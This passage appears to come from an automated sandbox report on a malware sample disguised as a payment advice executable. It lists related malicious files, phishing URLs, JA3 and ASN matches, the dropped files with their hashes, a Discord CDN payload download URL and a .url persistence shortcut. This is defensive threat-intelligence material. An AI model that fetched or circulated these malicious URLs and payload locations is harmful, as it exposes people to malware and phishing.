                                                                                                                                                • 162.159.136.232
                                                                                                                                                QgwtAnenic.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.136.232
                                                                                                                                                qclepSi8m5.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.136.232
                                                                                                                                                8fJPaTfN8D.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.137.232
                                                                                                                                                LJLMG5Syza.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.137.232
                                                                                                                                                99GQMirv2r.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.136.232
                                                                                                                                                7w6Yl263sM.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.136.232
                                                                                                                                                oAkfKRTCvN.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.128.233
                                                                                                                                                8Ce3uRUjxv.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.136.232
                                                                                                                                                plata bancara.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.232
                                                                                                                                                187QadygQl.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.136.232
                                                                                                                                                eybgvwBamW.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.136.232
                                                                                                                                                cdn.discordapp.comNyUnwsFSCa.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.133.233
                                                                                                                                                1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                                                                                                                • 162.159.129.233
                                                                                                                                                1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                                                                                                                • 162.159.134.233
                                                                                                                                                PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.133.233
                                                                                                                                                D6vy84I7rJ.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                Payment copy.docGet hashmaliciousBrowse
                                                                                                                                                • 162.159.129.233
                                                                                                                                                RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.133.233
                                                                                                                                                d6pj421rXA.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.130.233
                                                                                                                                                LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.134.233
                                                                                                                                                LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.134.233
                                                                                                                                                Order_Request_Retail_20-11691-AB.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 162.159.130.233
                                                                                                                                                http://cdn.discordapp.com/attachments/776234221668270104/776349109195898880/AWB_DHL733918737WA56301224799546260.pdf.7zGet hashmaliciousBrowse
                                                                                                                                                • 162.159.134.233
                                                                                                                                                89BR0suQeS.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.133.233
                                                                                                                                                89BR0suQeS.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.133.233
                                                                                                                                                RBBD5vivZc.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.130.233
                                                                                                                                                S01NwVhW5A.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.133.233
                                                                                                                                                qelMUH5CPF.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.134.233
                                                                                                                                                o9Fr4K1qcu.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                SecuriteInfo.com.Trojan.Siggen10.63473.17852.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.130.233

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                CLOUDFLARENETUSMV TBN.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.28.5.151
                                                                                                                                                PO 20-11-2020.ppsGet hashmaliciousBrowse
                                                                                                                                                • 172.67.22.135
                                                                                                                                                Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                23prRlqeGr.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.23.98.190
                                                                                                                                                RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                                                                                                                                                • 104.20.23.46
                                                                                                                                                RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                                                                                                                                                • 104.20.22.46
                                                                                                                                                iG9YiwEMru.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.27.132.115
                                                                                                                                                Avion Quotation Request.docGet hashmaliciousBrowse
                                                                                                                                                • 104.22.54.159
                                                                                                                                                SUSPENSION LETTER ON SIM SWAP.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.67.131.55
                                                                                                                                                Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                SaXJC2CZ8m.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.27.133.115
                                                                                                                                                PO91666. pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.67.143.180
                                                                                                                                                BT2wDapfoI.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.23.98.190
                                                                                                                                                ara.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.65.200.133
                                                                                                                                                ORDER FORM DENK.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.18.47.150
                                                                                                                                                araiki.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.65.200.133
                                                                                                                                                arailk.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.65.200.133
                                                                                                                                                https://filmconsultancy.bindwall.ml/mike@filmconsultancy.comGet hashmaliciousBrowse
                                                                                                                                                • 104.26.4.196
                                                                                                                                                https://trondiamond.co/OMMOM/OM9u8Get hashmaliciousBrowse
                                                                                                                                                • 104.16.18.94
                                                                                                                                                https://t.e.vailresorts.com/r/?id=h1bac782d,59eb410,55e61f1&VRI_v73=96008558&cmpid=EML_OPENDAYS_RESO_000_OK_SR_REN1Y_000000_TG0001_20201118_V00_EX001_LOCA_ANN_00000_000Get hashmaliciousBrowse
                                                                                                                                                • 104.16.149.64
                                                                                                                                                CLOUDFLARENETUSMV TBN.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.28.5.151
                                                                                                                                                PO 20-11-2020.ppsGet hashmaliciousBrowse
                                                                                                                                                • 172.67.22.135
                                                                                                                                                Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                23prRlqeGr.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.23.98.190
                                                                                                                                                RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                                                                                                                                                • 104.20.23.46
                                                                                                                                                RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                                                                                                                                                • 104.20.22.46
                                                                                                                                                iG9YiwEMru.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.27.132.115
                                                                                                                                                Avion Quotation Request.docGet hashmaliciousBrowse
                                                                                                                                                • 104.22.54.159
                                                                                                                                                SUSPENSION LETTER ON SIM SWAP.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.67.131.55
                                                                                                                                                Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                SaXJC2CZ8m.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.27.133.115
                                                                                                                                                PO91666. pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.67.143.180
                                                                                                                                                BT2wDapfoI.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.23.98.190
                                                                                                                                                ara.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.65.200.133
                                                                                                                                                ORDER FORM DENK.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.18.47.150
                                                                                                                                                araiki.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.65.200.133
                                                                                                                                                arailk.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.65.200.133
                                                                                                                                                https://filmconsultancy.bindwall.ml/mike@filmconsultancy.comGet hashmaliciousBrowse
                                                                                                                                                • 104.26.4.196
                                                                                                                                                https://trondiamond.co/OMMOM/OM9u8Get hashmaliciousBrowse
                                                                                                                                                • 104.16.18.94
                                                                                                                                                https://t.e.vailresorts.com/r/?id=h1bac782d,59eb410,55e61f1&VRI_v73=96008558&cmpid=EML_OPENDAYS_RESO_000_OK_SR_REN1Y_000000_TG0001_20201118_V00_EX001_LOCA_ANN_00000_000Get hashmaliciousBrowse
                                                                                                                                                • 104.16.149.64
                                                                                                                                                CLOUDFLARENETUSMV TBN.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.28.5.151
                                                                                                                                                PO 20-11-2020.ppsGet hashmaliciousBrowse
                                                                                                                                                • 172.67.22.135
                                                                                                                                                Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                23prRlqeGr.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.23.98.190
                                                                                                                                                RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                                                                                                                                                • 104.20.23.46
                                                                                                                                                RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                                                                                                                                                • 104.20.22.46
                                                                                                                                                iG9YiwEMru.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.27.132.115
                                                                                                                                                Avion Quotation Request.docGet hashmaliciousBrowse
                                                                                                                                                • 104.22.54.159
                                                                                                                                                SUSPENSION LETTER ON SIM SWAP.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.67.131.55
                                                                                                                                                Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                                                                                                                                                • 1.1.1.1
                                                                                                                                                SaXJC2CZ8m.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.27.133.115
                                                                                                                                                PO91666. pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.67.143.180
                                                                                                                                                BT2wDapfoI.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.23.98.190
                                                                                                                                                ara.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.65.200.133
                                                                                                                                                ORDER FORM DENK.exeGet hashmaliciousBrowse
                                                                                                                                                • 104.18.47.150
                                                                                                                                                araiki.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.65.200.133
                                                                                                                                                arailk.exeGet hashmaliciousBrowse
                                                                                                                                                • 172.65.200.133
                                                                                                                                                https://filmconsultancy.bindwall.ml/mike@filmconsultancy.comGet hashmaliciousBrowse
                                                                                                                                                • 104.26.4.196
                                                                                                                                                https://trondiamond.co/OMMOM/OM9u8Get hashmaliciousBrowse
                                                                                                                                                • 104.16.18.94
                                                                                                                                                https://t.e.vailresorts.com/r/?id=h1bac782d,59eb410,55e61f1&VRI_v73=96008558&cmpid=EML_OPENDAYS_RESO_000_OK_SR_REN1Y_000000_TG0001_20201118_V00_EX001_LOCA_ANN_00000_000Get hashmaliciousBrowse
                                                                                                                                                • 104.16.149.64
                                                                                                                                                AS-26496-GO-DADDY-COM-LLCUSBANK-STATMENT _xlsx.exeGet hashmaliciousBrowse
                                                                                                                                                • 166.62.27.57
                                                                                                                                                Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.71.232.3
                                                                                                                                                Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                MV.KMTC JEBEL ALI_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                PO0119-1620 LQSB 0320 Siemens.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.186.237.168
                                                                                                                                                http://homeschoolingteen.comGet hashmaliciousBrowse
                                                                                                                                                • 107.180.51.106
                                                                                                                                                http://p3nlhclust404.shr.prod.phx3.secureserver.netGet hashmaliciousBrowse
                                                                                                                                                • 72.167.191.65
                                                                                                                                                INQUIRY.exeGet hashmaliciousBrowse
                                                                                                                                                • 166.62.27.57
                                                                                                                                                moses.exeGet hashmaliciousBrowse
                                                                                                                                                • 148.66.138.196
                                                                                                                                                PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                https://j.mp/38NwiZZGet hashmaliciousBrowse
                                                                                                                                                • 107.180.26.71
                                                                                                                                                POSH XANADU Order-SP-20-V241e.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304Get hashmaliciousBrowse
                                                                                                                                                • 198.71.233.138
                                                                                                                                                https://tg325.infusion-links.com/api/v1/click/5985883831533568/6575528038498304Get hashmaliciousBrowse
                                                                                                                                                • 198.71.233.138
                                                                                                                                                anthony.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.4.22
                                                                                                                                                https://sailingfloridakeys.com/Guarantee/Get hashmaliciousBrowse
                                                                                                                                                • 104.238.92.18
                                                                                                                                                oX3qPEgl5x.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.71.232.3
                                                                                                                                                https://rfpforsubmission.typeform.com/to/Vtnb9OBCGet hashmaliciousBrowse
                                                                                                                                                • 148.72.93.116

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                37f463bf4616ecd445d4a1937da06e19Purchase Order Updates thyssenkrupp Materials Australia 900-5400006911.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://u19114248.ct.sendgrid.net/ls/click?upn=1kMFt-2Foese19BdzKqBBNxmUiDNiO3l4ozyKR3JHYHjGXyXtR1YgfLizwybC7hwFoy4wlb-2FUZczInc9Ssmzz4dQ-3D-3DuU6r_TCf26aIMQHFUMJSqtVnzlcWBqfQpkiFxCOBj9heiSevnqRkiapxQjkatt3r5u5xw-2FNDgXhA220pIRwcKmyMneET98pBkuhL-2FUwJCaSrvE5mZhnMBtJdZf9Opljklq5t7Y-2BINqElPIJU8bjYLY27qV6L-2FSwA36husfmMqwKagSwOgE04FdniEmY9uEbym50XNhqKw9lgczv6HrSrYNm6ouXnIayW-2FSBLzGYxoTYKe6OA-3DGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://rugbysacele.ro/zz/IK/of1/nhctfwp4x278qkbusvijl6z39y5ema1o0gdr597irqhw4x0fk3uevzlaoj12bdmpsnt8g6yce40h6iv7bprsowxd3z2nmu8kal5gcj1yf9qt?data=dmluY2VudC5kdXNvcmRldEBpbWQub3Jn#aHR0cHM6Ly9ydWdieXNhY2VsZS5yby96ei9JSy9vZjEvNDUzMjY3NzY4JmVtYWlsPXZpbmNlbnQuZHVzb3JkZXRAaW1kLm9yZw==Get hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                TR-D45.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                Shipping Documents (INV,PL,BL)_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.phpGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://filmconsultancy.bindwall.ml/mike@filmconsultancy.comGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://trondiamond.co/OMMOM/OM9u8Get hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://www.canva.com/design/DAEN9RlD8Vk/acBvt6UoL-DafjXmQk38pA/view?utm_content=DAEN9RlD8Vk&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://bit.ly/2UDM1ToGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://app.clio.com/link/AxWtfjmmzhjaGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                order.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                http://45.95.168.116Get hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://u7342898.ct.sendgrid.net/ls/click?upn=HCSIWZDf9Xl-2FB6XFKqg1zjEMCja-2BnYJ5hRYKkDjy2dSVqjHsLlv5ZMXJXnh9JLSzwabeBrvYMnX699odsYkKotv4jgW-2BTippSHf276Hpn3fz0kcusnYHGKND7vKQPAS7g42-2FTb5zb8CNq57r3z9Ilg-3D-3DWdrE_hNl5WjNXy0NQcJb9WqI7qh7uPLeU7UGDRahFCFKbQLS6qwym7zJ-2B-2BhWsSSLs8pHa1w9VDlWPsA7ahHsZZucjX2ktFkSy5vhVZT2L3Jxh6b-2FoboCHa2CJGLfF19s71-2FI3WPC7rECe-2BEO9fLwbfggsNq2V1-2FqgMhzgJQL411ZuD7Y8pECisPKLf0vf9WvB1fyVO9o6Euui31Jg3e-2FDialpg2CbkM21Us8J-2FBk13yWzh58-3DGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://carolearmstrongrealestate.com/wpe/14ea332d0684051d9fef033a5f1607dd?usr=cnBlbmRsZXRvbkBkYXRlc3dlaXNlci5jb20=Get hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                dde1df2ac5845a19823cabe182fcd870.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://prod.dfg152.ru/activate?key=23696252760045174930Get hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                dde1df2ac5845a19823cabe182fcd870.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                BYRkah8GsZ.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233
                                                                                                                                                https://www.canva.com/design/DAEN3YdYVHw/zaVHWoDx-9G9l20JXWSBtg/view?utm_content=DAEN3YdYVHw&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.233
                                                                                                                                                • 162.159.133.233

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Owdprrr[1]
                                                                                                                                                Process:C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1114112
                                                                                                                                                Entropy (8bit):3.9947435422074546
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:N3SiHKEEL7ayoGPMofRzwqQ9/So4H+SdmjefdN9MSyt6yp:l
                                                                                                                                                MD5:ECD8C8EDEE35CCA6CAD407E7A3E27793
                                                                                                                                                SHA1:2DD68BCEB14949C5A1C87B5EBB4FB58FA1C24FC2
                                                                                                                                                SHA-256:EB1A7529F296B0B910F24DA1A9325149C29A467DC10525C2E54A0AB0E706AA7A
                                                                                                                                                SHA-512:CA45D054C73BF017D0D308E0041ACE4FCE250CF2AA6E5CF815488CAE0B27F9BE9205FE5881990027909578373A4EA8334A2452A7A177F805736EBC1D7F9AEABD
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e17090870655a073a14602f545a775e3a38230e1d5c5f04292736041b4557122c3f0a01131e1a43627f6005106c605b75726a1c171f1f33000115051a791e20056a08631d141e3879786576021f1035710c17641d191e297c7f670c6d6e683b77116c176301705770736c0a1b1a164467726a0c176b6e5677746114131318360d0b1c021d7713220361006711131b35737162710c1212337a0413681a1c132375786002606c6e307f156010660c7a5e77746207191c1d4c637e6d091a616751707a6c1615181032010c190f177e14250d6c02611a1b1f0c302f080f1515124b6b7d6c08176168597e70641a1c17173a020d180217711c2b07640e68151c174b6663750f1a1d1c416371650710696b587f7d641514191d320e0417051f7
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Owdprrr[1]
                                                                                                                                                Process:C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1114112
                                                                                                                                                Entropy (8bit):3.9947435422074546
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:N3SiHKEEL7ayoGPMofRzwqQ9/So4H+SdmjefdN9MSyt6yp:l
                                                                                                                                                MD5:ECD8C8EDEE35CCA6CAD407E7A3E27793
                                                                                                                                                SHA1:2DD68BCEB14949C5A1C87B5EBB4FB58FA1C24FC2
                                                                                                                                                SHA-256:EB1A7529F296B0B910F24DA1A9325149C29A467DC10525C2E54A0AB0E706AA7A
                                                                                                                                                SHA-512:CA45D054C73BF017D0D308E0041ACE4FCE250CF2AA6E5CF815488CAE0B27F9BE9205FE5881990027909578373A4EA8334A2452A7A177F805736EBC1D7F9AEABD
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e17090870655a073a14602f545a775e3a38230e1d5c5f04292736041b4557122c3f0a01131e1a43627f6005106c605b75726a1c171f1f33000115051a791e20056a08631d141e3879786576021f1035710c17641d191e297c7f670c6d6e683b77116c176301705770736c0a1b1a164467726a0c176b6e5677746114131318360d0b1c021d7713220361006711131b35737162710c1212337a0413681a1c132375786002606c6e307f156010660c7a5e77746207191c1d4c637e6d091a616751707a6c1615181032010c190f177e14250d6c02611a1b1f0c302f080f1515124b6b7d6c08176168597e70641a1c17173a020d180217711c2b07640e68151c174b6663750f1a1d1c416371650710696b587f7d641514191d320e0417051f7
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Owdprrr[2]
                                                                                                                                                Process:C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:downloaded
                                                                                                                                                Size (bytes):1114112
                                                                                                                                                Entropy (8bit):3.9947435422074546
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:N3SiHKEEL7ayoGPMofRzwqQ9/So4H+SdmjefdN9MSyt6yp:l
                                                                                                                                                MD5:ECD8C8EDEE35CCA6CAD407E7A3E27793
                                                                                                                                                SHA1:2DD68BCEB14949C5A1C87B5EBB4FB58FA1C24FC2
                                                                                                                                                SHA-256:EB1A7529F296B0B910F24DA1A9325149C29A467DC10525C2E54A0AB0E706AA7A
                                                                                                                                                SHA-512:CA45D054C73BF017D0D308E0041ACE4FCE250CF2AA6E5CF815488CAE0B27F9BE9205FE5881990027909578373A4EA8334A2452A7A177F805736EBC1D7F9AEABD
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                IE Cache URL:https://cdn.discordapp.com/attachments/778481617605492770/779193354457841664/Owdprrr
                                                                                                                                                Preview: 70c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e170908706e763813170c0968616f3f1e17090870655a073a14602f545a775e3a38230e1d5c5f04292736041b4557122c3f0a01131e1a43627f6005106c605b75726a1c171f1f33000115051a791e20056a08631d141e3879786576021f1035710c17641d191e297c7f670c6d6e683b77116c176301705770736c0a1b1a164467726a0c176b6e5677746114131318360d0b1c021d7713220361006711131b35737162710c1212337a0413681a1c132375786002606c6e307f156010660c7a5e77746207191c1d4c637e6d091a616751707a6c1615181032010c190f177e14250d6c02611a1b1f0c302f080f1515124b6b7d6c08176168597e70641a1c17173a020d180217711c2b07640e68151c174b6663750f1a1d1c416371650710696b587f7d641514191d320e0417051f7
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe
                                                                                                                                                Process:C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1346928
                                                                                                                                                Entropy (8bit):7.062405677677901
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:aVggyMBuni3KmeVXHY7hiBrGNLYragKkTZxUScffBxsqPerMmzZC3N4Sr5RPEwdO:a5uWVLYLnURxsqPerMmzZC3N4Sr5RPEO
                                                                                                                                                MD5:5D3D23738B2B4BB1F7FE3371EA7ECC76
                                                                                                                                                SHA1:4E72608C340C7B18F4FF359552DA57C9DEE29E99
                                                                                                                                                SHA-256:21B054A3B319B950887EFF329EBB237A5D442E6742E94D66D2FF17CD85F8D930
                                                                                                                                                SHA-512:0D62A76EBD28FF69C4D9201F01E39E1B1737E521635AFC37FD10EB04007F9538B7E8C2CD5A8A5697FAB2E2768BD22062DFA0002EA4FCEB4AEBEC7B4EBA76BA2A
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................R... .......j.......p....@..............................................@..............................F-...................v..p....@...............................0.......................................................text...PD.......F.................. ..`.itext.......`.......J.............. ..`.data....7...p...8...V..............@....bss....8;...............................idata..F-..........................@....tls....@.... ...........................rdata.......0......................@..@.reloc.......@......................@..B.rsrc................f..............@..@.....................v..............@..@................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\pdwO.url
                                                                                                                                                Process:C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                                                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Owdpdrv.exe>), ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):169
                                                                                                                                                Entropy (8bit):5.146619155679392
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:HRAbABGQYmHmEX+Ro6p4EkD5oef5yaKhPL6vQJ5ontCBuXV9k/qIH19Yxv:HRYFVmcKaJkDlR9umvQJ5OtZF9k/qI7I
                                                                                                                                                MD5:45AE9651732EF16084522D728371E38F
                                                                                                                                                SHA1:77E3DCF754603F85091F3979123E796C65D26277
                                                                                                                                                SHA-256:DFCC0B2C174970668F72ABEF671EF6211D15DA669B7D40F488B0097F4FC69E55
                                                                                                                                                SHA-512:4BD6911AF65F0B143026446F176036C7FFE02F965A4FB42CE3A92CC669EC61DDDCCC95C7B9DD32AD32BC6801DF99205905E1A2ADC5C17468B6570FC927DC32D0
                                                                                                                                                Malicious:false
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\pdwO.url, Author: @itsreallynick (Nick Carr)
                                                                                                                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\pdwO.url, Author: @itsreallynick (Nick Carr)
